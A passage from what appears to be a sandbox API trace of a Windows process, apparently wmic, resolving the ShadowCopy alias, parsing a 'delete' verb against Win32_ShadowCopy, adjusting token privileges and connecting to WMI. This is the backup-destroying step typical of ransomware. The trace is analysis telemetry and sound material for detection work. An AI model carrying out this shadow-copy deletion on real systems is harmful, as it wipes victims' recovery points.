() returned 0xfb4 [0143.760] ??0CHString@@QEAA@XZ () returned 0x26d57ff428 [0143.760] malloc (_Size=0x18) returned 0x1899e8dddd0 [0143.760] IWbemClassObject:Get (in: This=0x1899e5953d0, wszName="Namespace", lFlags=0, pVal=0x26d57ff430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.760] free (_Block=0x1899e8dddd0) [0143.760] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0143.760] malloc (_Size=0x16) returned 0x1899e8ddbd0 [0143.760] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0143.760] malloc (_Size=0x18) returned 0x1899e8ddf50 [0143.760] IWbemClassObject:Get (in: This=0x1899e5953d0, wszName="Locale", lFlags=0, pVal=0x26d57ff430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1899e574478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.760] free (_Block=0x1899e8ddf50) [0143.760] lstrlenW (lpString="ms_409") returned 6 [0143.760] malloc (_Size=0xe) returned 0x1899e8dd890 [0143.760] lstrlenW (lpString="ms_409") returned 6 [0143.760] malloc (_Size=0x18) returned 0x1899e8ddfd0 [0143.760] IWbemClassObject:Get (in: This=0x1899e5953d0, wszName="User", lFlags=0, pVal=0x26d57ff430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1899e574478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff430*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.760] free (_Block=0x1899e8ddfd0) [0143.760] malloc (_Size=0x18) returned 0x1899e8ddbf0 [0143.761] IWbemClassObject:Get (in: This=0x1899e5953d0, wszName="Password", lFlags=0, pVal=0x26d57ff430*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff430*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.761] free (_Block=0x1899e8ddbf0) [0143.761] malloc (_Size=0x18) returned 0x1899e8dda30 [0143.761] IWbemClassObject:Get (in: This=0x1899e5953d0, wszName="Server", lFlags=0, pVal=0x26d57ff430*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.761] free (_Block=0x1899e8dda30) [0143.761] lstrlenW (lpString=".") returned 1 [0143.761] malloc (_Size=0x4) returned 0x1899e8debc0 [0143.761] lstrlenW (lpString=".") returned 1 [0143.761] malloc (_Size=0x18) returned 0x1899e8dd8b0 [0143.761] IWbemClassObject:Get (in: This=0x1899e5953d0, wszName="Authority", lFlags=0, pVal=0x26d57ff430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1899e574478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff430*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.761] free (_Block=0x1899e8dd8b0) [0143.761] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.761] IUnknown:Release (This=0x1899e5953d0) returned 0x1 [0143.761] GetCurrentThreadId () returned 0xfb4 [0143.761] ??0CHString@@QEAA@XZ () returned 0x26d57ff428 [0143.761] malloc (_Size=0x18) returned 0x1899e8ddf50 [0143.761] IWbemClassObject:Get (in: This=0x1899e595120, wszName="__RELPATH", lFlags=0, pVal=0x26d57ff438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.761] free (_Block=0x1899e8ddf50) [0143.761] malloc (_Size=0x18) returned 0x1899e8ddb90 [0143.761] GetCurrentThreadId () returned 0xfb4 [0143.762] ??0CHString@@QEAA@XZ () returned 0x26d57ff2f8 [0143.762] ??0CHString@@QEAA@PEBG@Z () returned 0x26d57ff310 [0143.762] ??0CHString@@QEAA@AEBV0@@Z () returned 0x26d57ff288 [0143.762] ?Empty@CHString@@QEAAXXZ () returned 0x7ffe5fac674c [0143.762] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x1899e8debe0 [0143.762] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0143.762] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x26d57ff298 [0143.762] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x26d57ff290 [0143.762] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26d57ff310 [0143.762] ??1CHString@@QEAA@XZ () returned 0x1 [0143.762] ??1CHString@@QEAA@XZ () returned 0x1 [0143.762] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x26d57ff260 [0143.762] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26d57ff288 [0143.762] ??1CHString@@QEAA@XZ () returned 0x1 [0143.762] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x1899e8dec50 [0143.762] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0143.762] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x26d57ff298 [0143.762] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x26d57ff290 [0143.762] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26d57ff310 [0143.762] ??1CHString@@QEAA@XZ () returned 0x1 [0143.762] ??1CHString@@QEAA@XZ () returned 0x1 [0143.762] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x26d57ff260 [0143.763] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26d57ff288 [0143.763] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.763] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7ffe5fac6740 [0143.763] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.763] malloc (_Size=0x18) returned 0x1899e8ddbb0 [0143.763] malloc (_Size=0x18) returned 0x1899e8ddad0 [0143.763] malloc (_Size=0x18) returned 0x1899e8ddc10 [0143.763] malloc (_Size=0x18) returned 0x1899e8ddf50 [0143.763] malloc (_Size=0x18) returned 0x1899e8ddf90 [0143.763] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0143.763] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0143.763] malloc (_Size=0x18) returned 0x1899e8ddc50 [0143.763] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0143.764] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0143.764] malloc (_Size=0x18) returned 0x1899e8dd990 [0143.764] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0143.764] SysStringLen (param_1="\"") returned 0x1 [0143.764] free (_Block=0x1899e8ddc50) [0143.764] free (_Block=0x1899e8ddf90) [0143.764] free (_Block=0x1899e8ddf50) [0143.764] free (_Block=0x1899e8ddc10) [0143.764] free (_Block=0x1899e8ddad0) [0143.764] free (_Block=0x1899e8ddbb0) [0143.764] IWbemServices:GetObject (in: This=0x1899e581b60, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x26d57ff2d8*=0x0, ppCallResult=0x0 | out: ppObject=0x26d57ff2d8*=0x1899e5959b0, ppCallResult=0x0) returned 0x0 [0143.775] malloc (_Size=0x18) returned 0x1899e8ddf70 [0143.775] IWbemClassObject:Get (in: This=0x1899e5959b0, wszName="Text", lFlags=0, pVal=0x26d57ff320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff320*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1899e579990*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1899e575770, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.775] free (_Block=0x1899e8ddf70) [0143.775] SafeArrayGetLBound (in: psa=0x1899e579990, nDim=0x1, plLbound=0x26d57ff2ec | out: plLbound=0x26d57ff2ec) returned 0x0 [0143.775] SafeArrayGetUBound (in: psa=0x1899e579990, nDim=0x1, plUbound=0x26d57ff2f0 | out: plUbound=0x26d57ff2f0) returned 0x0 [0143.775] SafeArrayGetElement (in: psa=0x1899e579990, rgIndices=0x26d57ff2e8, pv=0x26d57ff300 | out: pv=0x26d57ff300) returned 0x0 [0143.775] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0143.775] malloc (_Size=0x18) returned 0x1899e8ddd10 [0143.775] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0143.775] free (_Block=0x1899e8ddcf0) [0143.775] IUnknown:Release (This=0x1899e5959b0) returned 0x0 [0143.775] free (_Block=0x1899e8dd990) [0143.775] ??1CHString@@QEAA@XZ () returned 0x1 [0143.775] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.775] free (_Block=0x1899e8ddb90) [0143.775] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.775] lstrlenW (lpString="Shadow copy management.") returned 23 [0143.775] malloc (_Size=0x30) returned 0x1899e8da490 [0143.775] lstrlenW (lpString="Shadow copy management.") returned 23 [0143.776] free (_Block=0x1899e8ddd10) [0143.776] IUnknown:Release (This=0x1899e595120) returned 0x0 [0143.776] free (_Block=0x1899e8ddf30) [0143.776] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.776] lstrlenW (lpString="PATH") returned 4 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0143.776] lstrlenW (lpString="WHERE") returned 5 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0143.776] lstrlenW (lpString="(") returned 1 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0143.776] lstrlenW (lpString="/") returned 1 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0143.776] lstrlenW (lpString="-") returned 1 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0143.776] malloc (_Size=0x18) returned 0x1899e8ddbf0 [0143.776] lstrlenW (lpString="GET") returned 3 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0143.776] lstrlenW (lpString="LIST") returned 4 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0143.776] lstrlenW (lpString="SET") returned 3 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0143.776] lstrlenW (lpString="CREATE") returned 6 [0143.776] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0143.777] lstrlenW (lpString="CALL") returned 4 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0143.777] lstrlenW (lpString="ASSOC") returned 5 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0143.777] lstrlenW (lpString="DELETE") returned 6 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0143.777] free (_Block=0x1899e8ddbf0) [0143.777] lstrlenW (lpString="/") returned 1 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0143.777] lstrlenW (lpString="-") returned 1 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] malloc (_Size=0xe) returned 0x1899e8dddd0 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] lstrlenW (lpString="GET") returned 3 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0143.777] lstrlenW (lpString="LIST") returned 4 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0143.777] lstrlenW (lpString="SET") returned 3 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0143.777] lstrlenW (lpString="CREATE") returned 6 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0143.777] lstrlenW (lpString="CALL") returned 4 [0143.777] lstrlenW (lpString="delete") returned 6 [0143.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0143.778] lstrlenW (lpString="ASSOC") returned 5 [0143.778] lstrlenW (lpString="delete") returned 6 [0143.778] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0143.778] lstrlenW (lpString="DELETE") returned 6 [0143.778] lstrlenW (lpString="delete") returned 6 [0143.778] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0143.778] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0143.778] malloc (_Size=0x3e) returned 0x1899e8debe0 [0143.778] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0143.778] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0143.778] malloc (_Size=0x18) returned 0x1899e8ddf30 [0143.778] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x65006c00650053 | out: _String=0x0, _Context=0x65006c00650053) returned="*" [0143.778] lstrlenW (lpString="FROM") returned 4 [0143.778] lstrlenW (lpString="*") returned 1 [0143.778] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0143.778] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0143.778] free (_Block=0x1899e8ddf30) [0143.778] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1899e440db0*="\x01\x01" | out: _String=0x0, _Context=0x1899e440db0*="\x01\x01") returned="from" [0143.778] lstrlenW (lpString="FROM") returned 4 [0143.778] lstrlenW (lpString="from") returned 4 [0143.778] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0143.778] malloc (_Size=0x18) returned 0x1899e8ddb50 [0143.778] free (_Block=0x1899e8ddcf0) [0143.778] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1899e440db0*="\x01\x01" | out: _String=0x0, _Context=0x1899e440db0*="\x01\x01") returned="Win32_ShadowCopy" [0143.778] malloc (_Size=0x18) returned 0x1899e8ddaf0 [0143.778] free (_Block=0x1899e8ddb50) [0143.778] free (_Block=0x1899e8debe0) [0143.778] free (_Block=0x1899e8ddaf0) [0143.778] lstrlenW (lpString="SET") returned 3 [0143.778] lstrlenW (lpString="delete") returned 6 [0143.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0143.779] lstrlenW (lpString="CREATE") returned 6 [0143.779] lstrlenW (lpString="delete") returned 6 [0143.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0143.779] free (_Block=0x1899e8ddd90) [0143.779] malloc (_Size=0x8) returned 0x1899e8debe0 [0143.779] lstrlenW (lpString="GET") returned 3 [0143.779] lstrlenW (lpString="delete") returned 6 [0143.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0143.779] lstrlenW (lpString="LIST") returned 4 [0143.779] lstrlenW (lpString="delete") returned 6 [0143.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0143.779] lstrlenW (lpString="ASSOC") returned 5 [0143.779] lstrlenW (lpString="delete") returned 6 [0143.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0143.779] WbemLocator:IUnknown:AddRef (This=0x1899e52bbe0) returned 0x3 [0143.779] free (_Block=0x1899e8d1790) [0143.779] lstrlenW (lpString="") returned 0 [0143.779] lstrlenW (lpString="NQDPDE") returned 6 [0143.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0143.779] lstrlenW (lpString="NQDPDE") returned 6 [0143.779] malloc (_Size=0xe) returned 0x1899e8ddad0 [0143.779] lstrlenW (lpString="NQDPDE") returned 6 [0143.779] GetCurrentThreadId () returned 0xfb4 [0143.779] GetCurrentProcess () returned 0xffffffffffffffff [0143.779] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26d57ff660 | out: TokenHandle=0x26d57ff660*=0x2ac) returned 1 [0143.779] GetTokenInformation (in: TokenHandle=0x2ac, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d57ff658 | out: TokenInformation=0x0, ReturnLength=0x26d57ff658) returned 0 [0143.779] malloc (_Size=0x118) returned 0x1899e8dec00 [0143.779] GetTokenInformation (in: TokenHandle=0x2ac, TokenInformationClass=0x3, TokenInformation=0x1899e8dec00, TokenInformationLength=0x118, ReturnLength=0x26d57ff658 | out: TokenInformation=0x1899e8dec00, ReturnLength=0x26d57ff658) returned 1 [0143.779] AdjustTokenPrivileges (in: TokenHandle=0x2ac, DisableAllPrivileges=0, NewState=0x1899e8dec00*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-642658974, Attributes=0x3dca), (Luid.LowPart=0x189, Luid.HighPart=-1634920560, Attributes=0x189), (Luid.LowPart=0x22, Luid.HighPart=687865897, Attributes=0x3ddd), (Luid.LowPart=0x189, Luid.HighPart=-1634926256, Attributes=0x189), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0143.779] free (_Block=0x1899e8dec00) [0143.779] CloseHandle (hObject=0x2ac) returned 1 [0143.779] lstrlenW (lpString="GET") returned 3 [0143.779] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0143.780] lstrlenW (lpString="LIST") returned 4 [0143.780] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0143.780] lstrlenW (lpString="SET") returned 3 [0143.780] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0143.780] lstrlenW (lpString="CALL") returned 4 [0143.780] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0143.780] lstrlenW (lpString="ASSOC") returned 5 [0143.780] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0143.780] lstrlenW (lpString="CREATE") returned 6 [0143.780] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0143.780] lstrlenW (lpString="DELETE") returned 6 [0143.780] lstrlenW (lpString="delete") returned 6 [0143.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0143.780] malloc (_Size=0x18) returned 0x1899e8ddc50 [0143.780] lstrlenA (lpString="") returned 0 [0143.780] malloc (_Size=0x2) returned 0x1899e8d1790 [0143.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7194cc40c, cbMultiByte=-1, lpWideCharStr=0x1899e8d1790, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0143.780] free (_Block=0x1899e8d1790) [0143.780] malloc (_Size=0x18) returned 0x1899e8ddf50 [0143.780] lstrlenA (lpString="") returned 0 [0143.780] malloc (_Size=0x2) returned 0x1899e8d1790 [0143.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7194cc40c, cbMultiByte=-1, lpWideCharStr=0x1899e8d1790, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0143.781] free (_Block=0x1899e8d1790) [0143.781] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0143.781] malloc (_Size=0x3e) returned 0x1899e8dec00 [0143.781] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0143.781] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff40 | out: _String="Select", _Context=0xffffffffffffff40) returned="Select" [0143.781] malloc (_Size=0x18) returned 0x1899e8ddf30 [0143.781] free (_Block=0x1899e8ddf50) [0143.781] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1899e440db0*="\x01\x01" | out: _String=0x0, _Context=0x1899e440db0*="\x01\x01") returned="*" [0143.781] lstrlenW (lpString="FROM") returned 4 [0143.781] lstrlenW (lpString="*") returned 1 [0143.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0143.781] malloc (_Size=0x18) returned 0x1899e8ddf50 [0143.781] free (_Block=0x1899e8ddf30) [0143.781] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1899e440db0*="\x01\x01" | out: _String=0x0, _Context=0x1899e440db0*="\x01\x01") returned="from" [0143.781] lstrlenW (lpString="FROM") returned 4 [0143.781] lstrlenW (lpString="from") returned 4 [0143.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0143.781] malloc (_Size=0x18) returned 0x1899e8ddd90 [0143.781] free (_Block=0x1899e8ddf50) [0143.781] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1899e440db0*="\x01\x01" | out: _String=0x0, _Context=0x1899e440db0*="\x01\x01") returned="Win32_ShadowCopy" [0143.781] malloc (_Size=0x18) returned 0x1899e8ddf30 [0143.781] free (_Block=0x1899e8ddd90) [0143.781] free (_Block=0x1899e8dec00) [0143.781] malloc (_Size=0x18) returned 0x1899e8ddab0 [0143.781] malloc (_Size=0x18) returned 0x1899e8ddfd0 [0143.781] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0143.781] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0143.782] free (_Block=0x1899e8ddc50) [0143.782] free (_Block=0x1899e8ddab0) [0144.139] ??0CHString@@QEAA@XZ () returned 0x26d57ff5d0 [0144.139] GetCurrentThreadId () returned 0xfb4 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddfb0 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddf50 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddf70 [0144.140] malloc (_Size=0x18) returned 0x1899e8dd8b0 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddbf0 [0144.140] SysStringLen (param_1="\\\\") returned 0x2 [0144.140] SysStringLen (param_1="NQDPDE") returned 0x6 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddd30 [0144.140] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0144.140] SysStringLen (param_1="\\") returned 0x1 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddf90 [0144.140] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0144.140] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0144.140] free (_Block=0x1899e8ddd30) [0144.140] free (_Block=0x1899e8ddbf0) [0144.140] free (_Block=0x1899e8dd8b0) [0144.140] free (_Block=0x1899e8ddf70) [0144.140] free (_Block=0x1899e8ddf50) [0144.140] free (_Block=0x1899e8ddfb0) [0144.140] malloc (_Size=0x18) returned 0x1899e8ddaf0 [0144.140] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0144.141] malloc (_Size=0x18) returned 0x1899e8ddd10 [0144.141] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1899e52bbe0, strNetworkResource="\\\\NQDPDE\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, 